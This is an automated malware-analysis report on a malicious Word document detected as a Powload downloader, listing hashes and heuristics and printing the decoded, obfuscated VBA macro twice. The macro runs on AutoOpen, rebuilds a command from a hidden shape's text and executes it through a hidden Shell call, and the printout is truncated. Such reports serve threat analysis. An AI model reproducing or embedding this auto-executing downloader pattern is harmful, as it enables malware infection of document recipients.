Office (OLE) malware analysis — malicious · 1e4e09475ea19c73

MALICIOUS

Office (OLE)

81.8 KB Created: 2018-11-21 05:48:00 Authoring application: Microsoft Office Word First seen: 2018-12-09

MD5: dc2c5cf95f3394e7eadbfa9a88726fc9 SHA-1: e27a30207a74195a98a13f0548718fc242a65eea SHA-256: 1e4e09475ea19c7398d880ae1be2b0972f0f5404501effdd27bd66b63ae7b230

142 Risk Score

Heuristics 5

ClamAV: Doc.Downloader.Powload-6769651-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6769651-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4317 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4317 bytes
SHA-256: `1f02b8d6f37196932880dd9c64eb6fd1d0ee72b35bcb0ad4d7879c67016420fc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vfiQkVjmjUMaE" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next If XsisoOWj Xor mRlnc Then bJNwzj = KWORjG End If If BzHtTz Xor SEYBH Then rBfEjlZI = Sgn(VwlBKiIiX) End If QQAnKrT = (LIFowqB - CDbl(140986258) / rJhwj + Sgn(68556777)) - 25072658 + CInt(KHRpZKa) - 8917402 * Fix(147506319 * Oct(OqOUMPINz)) Set jzvApYQUq = jGwIAjBn On Error Resume Next If lLpXknlEZ Xor krikqDT Then UqKzE = QDpXAhmw End If If MItiFdhpv Xor RoFjanqE Then WakoHE = Sgn(hwOEs) End If lASbwZNa = (BOJnwKTO - CDbl(235585072) / cScQb + Sgn(137898856)) - 254937295 + CInt(wvjbrvb) - 20565919 * Fix(32846060 * Oct(zrRqtk)) Set WiUIwNk = tQWJjqG Set PfCaWOLtF = Shapes("CnOchIQ") On Error Resume Next If qjOzDi Xor jGzkbVK Then KJKsGaJ = KWiJz End If If GbcqdqhNR Xor UajCQGj Then bYUpH = Sgn(dpjiDaZUb) End If AXHkrTuw = (fYjtHkEnd - CDbl(226960590) / iQUdNoK + Sgn(336120833)) - 64919348 + CInt(EAwwCswwI) - 50454555 * Fix(195490212 * Oct(zbazvZz)) Set nvlCFjDiX = JvnBb On Error Resume Next If EXzCr Xor HCqSK Then uohYQNoGF = uDrjhu End If If wGOnpDYV Xor fuQIotcA Then dOrsk = Sgn(wutduKITM) End If tMvJFl = (Dditp - CDbl(323766671) / AaqcDjs + Sgn(26210325)) - 141832848 + CInt(puKvbc) - 147866915 * Fix(177256138 * Oct(puhhq)) Set sFoPC = IzXcU On Error Resume Next If ucwRIkF Xor DlNQcNVY Then zztQvREjE = sDitTtYnI End If If iuftiCIkJ Xor tcqSbISI Then KtiEvMiZs = Sgn(XEZNbJFUz) End If tJTaWvQM = (RLbQpz - CDbl(20027436) / pkjzd + Sgn(104794238)) - 277358829 + CInt(dUPPJVoS) - 174984953 * Fix(35354168 * Oct(ZHizw)) Set NajvnkP = IQjTiQt zJCYurYd = "" + japrbU + McALSmH + PfCaWOLtF.TextFrame.TextRange.Text + szbKaE + RjwnTG On Error Resume Next If zHWkjM Xor whJPSFIw Then hZBzQjPcR = uamCCaJ End If If YfZEqzTsA Xor BwVOupz Then jNuTrtTK = Sgn(ILiHpJ) End If kRTci = (fXjoa - CDbl(126764372) / ffwER + Sgn(303045269)) - 316998141 + CInt(Fnflf) - 217292170 * Fix(74609045 * Oct(VTMoLicW)) Set BdhXmDT = HmcPZpvNJ On Error Resume Next If PlZqpZf Xor fMucEiblZ Then swCpCE = FRIBzrCGQ End If If IIbFE Xor cXmEGZTj Then HLoISaj = Sgn(zkHWzhV) End If VoWSczKoK = (RPAkjwb - CDbl(166160789) / fOzwiYncV + Sgn(318272471)) - 100069385 + CInt(pQMkkzN) - 338723888 * Fix(63517030 * Oct(AzsIT)) Set ODJvYrp = XqnupVp On Error Resume Next If XkOoXI Xor FcoiXDm Then qtPsU = wItkj End If If KdlHmQUpJ Xor infnDZICw Then cGSojSq = Sgn(YbUEnK) End If bqjrGj = (rvOcMjBZA - CDbl(284523010) / EVDLzYTa + Sgn(61099636)) - 109822060 + CInt(bazVZbjb) - 72307416 * Fix(276645183 * Oct(fPXZHGJJz)) Set dQjpJQt = XfajI On Error Resume Next If olFRtES Xor hbdzqWUaH Then ZjpqSMXda = aiHwkrDkC End If If wRKqwKPiC Xor JICJR Then ozSstQd = Sgn(VDTjOwT) End If XJwIVwuI = (obXlRcwfG - CDbl(20641839) / RJDio + Sgn(254461154)) - 139223241 + CInt(qiTDjZlsK) - 59679732 * Fix(53539363 * Oct(DJvEpFnD)) Set VBIvOSN = PTidB Interaction.Shell@ zJCYurYd + rHZpZjz + onXRNRzR, vbHide On Error Resume Next If NWvUt Xor fkRWlF Then KBwtk = dfIMoH End If If BfifjsY Xor UvukTif Then kJHGVDDL = Sgn(wLnbEJ) End If NUMzF = (qthdpFEJ - CDbl(112679892) / wwYDhADz + Sgn(180914089)) - 126494494 + CInt(jjkDPl) - 262861469 * Fix(151894472 * Oct(VfdzTNZrN)) Set HDfdpijGZ = ROYmSG On Error Resume Next If HGArpj Xor jUbdwvjEh Then SCKVK = EfnImrjEK End If If JIuVmWfwf Xor fOrrIdD Then ... (truncated)

SHA-256: 1f02b8d6f37196932880dd9c64eb6fd1d0ee72b35bcb0ad4d7879c67016420fc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "vfiQkVjmjUMaE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      If XsisoOWj Xor mRlnc Then
         bJNwzj = KWORjG
      End If
      If BzHtTz Xor SEYBH Then
         rBfEjlZI = Sgn(VwlBKiIiX)
      End If
   QQAnKrT = (LIFowqB - CDbl(140986258) / rJhwj + Sgn(68556777)) - 25072658 + CInt(KHRpZKa) - 8917402 * Fix(147506319 * Oct(OqOUMPINz))
Set jzvApYQUq = jGwIAjBn
   On Error Resume Next
      If lLpXknlEZ Xor krikqDT Then
         UqKzE = QDpXAhmw
      End If
      If MItiFdhpv Xor RoFjanqE Then
         WakoHE = Sgn(hwOEs)
      End If
   lASbwZNa = (BOJnwKTO - CDbl(235585072) / cScQb + Sgn(137898856)) - 254937295 + CInt(wvjbrvb) - 20565919 * Fix(32846060 * Oct(zrRqtk))
Set WiUIwNk = tQWJjqG
Set PfCaWOLtF = Shapes("CnOchIQ")
   On Error Resume Next
      If qjOzDi Xor jGzkbVK Then
         KJKsGaJ = KWiJz
      End If
      If GbcqdqhNR Xor UajCQGj Then
         bYUpH = Sgn(dpjiDaZUb)
      End If
   AXHkrTuw = (fYjtHkEnd - CDbl(226960590) / iQUdNoK + Sgn(336120833)) - 64919348 + CInt(EAwwCswwI) - 50454555 * Fix(195490212 * Oct(zbazvZz))
Set nvlCFjDiX = JvnBb
   On Error Resume Next
      If EXzCr Xor HCqSK Then
         uohYQNoGF = uDrjhu
      End If
      If wGOnpDYV Xor fuQIotcA Then
         dOrsk = Sgn(wutduKITM)
      End If
   tMvJFl = (Dditp - CDbl(323766671) / AaqcDjs + Sgn(26210325)) - 141832848 + CInt(puKvbc) - 147866915 * Fix(177256138 * Oct(puhhq))
Set sFoPC = IzXcU
   On Error Resume Next
      If ucwRIkF Xor DlNQcNVY Then
         zztQvREjE = sDitTtYnI
      End If
      If iuftiCIkJ Xor tcqSbISI Then
         KtiEvMiZs = Sgn(XEZNbJFUz)
      End If
   tJTaWvQM = (RLbQpz - CDbl(20027436) / pkjzd + Sgn(104794238)) - 277358829 + CInt(dUPPJVoS) - 174984953 * Fix(35354168 * Oct(ZHizw))
Set NajvnkP = IQjTiQt
zJCYurYd = "" + japrbU + McALSmH + PfCaWOLtF.TextFrame.TextRange.Text + szbKaE + RjwnTG
   On Error Resume Next
      If zHWkjM Xor whJPSFIw Then
         hZBzQjPcR = uamCCaJ
      End If
      If YfZEqzTsA Xor BwVOupz Then
         jNuTrtTK = Sgn(ILiHpJ)
      End If
   kRTci = (fXjoa - CDbl(126764372) / ffwER + Sgn(303045269)) - 316998141 + CInt(Fnflf) - 217292170 * Fix(74609045 * Oct(VTMoLicW))
Set BdhXmDT = HmcPZpvNJ
   On Error Resume Next
      If PlZqpZf Xor fMucEiblZ Then
         swCpCE = FRIBzrCGQ
      End If
      If IIbFE Xor cXmEGZTj Then
         HLoISaj = Sgn(zkHWzhV)
      End If
   VoWSczKoK = (RPAkjwb - CDbl(166160789) / fOzwiYncV + Sgn(318272471)) - 100069385 + CInt(pQMkkzN) - 338723888 * Fix(63517030 * Oct(AzsIT))
Set ODJvYrp = XqnupVp
   On Error Resume Next
      If XkOoXI Xor FcoiXDm Then
         qtPsU = wItkj
      End If
      If KdlHmQUpJ Xor infnDZICw Then
         cGSojSq = Sgn(YbUEnK)
      End If
   bqjrGj = (rvOcMjBZA - CDbl(284523010) / EVDLzYTa + Sgn(61099636)) - 109822060 + CInt(bazVZbjb) - 72307416 * Fix(276645183 * Oct(fPXZHGJJz))
Set dQjpJQt = XfajI
   On Error Resume Next
      If olFRtES Xor hbdzqWUaH Then
         ZjpqSMXda = aiHwkrDkC
      End If
      If wRKqwKPiC Xor JICJR Then
         ozSstQd = Sgn(VDTjOwT)
      End If
   XJwIVwuI = (obXlRcwfG - CDbl(20641839) / RJDio + Sgn(254461154)) - 139223241 + CInt(qiTDjZlsK) - 59679732 * Fix(53539363 * Oct(DJvEpFnD))
Set VBIvOSN = PTidB
Interaction.Shell@ zJCYurYd + rHZpZjz + onXRNRzR, vbHide
   On Error Resume Next
      If NWvUt Xor fkRWlF Then
         KBwtk = dfIMoH
      End If
      If BfifjsY Xor UvukTif Then
         kJHGVDDL = Sgn(wLnbEJ)
      End If
   NUMzF = (qthdpFEJ - CDbl(112679892) / wwYDhADz + Sgn(180914089)) - 126494494 + CInt(jjkDPl) - 262861469 * Fix(151894472 * Oct(VfdzTNZrN))
Set HDfdpijGZ = ROYmSG
   On Error Resume Next
      If HGArpj Xor jUbdwvjEh Then
         SCKVK = EfnImrjEK
      End If
      If JIuVmWfwf Xor fOrrIdD Then

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.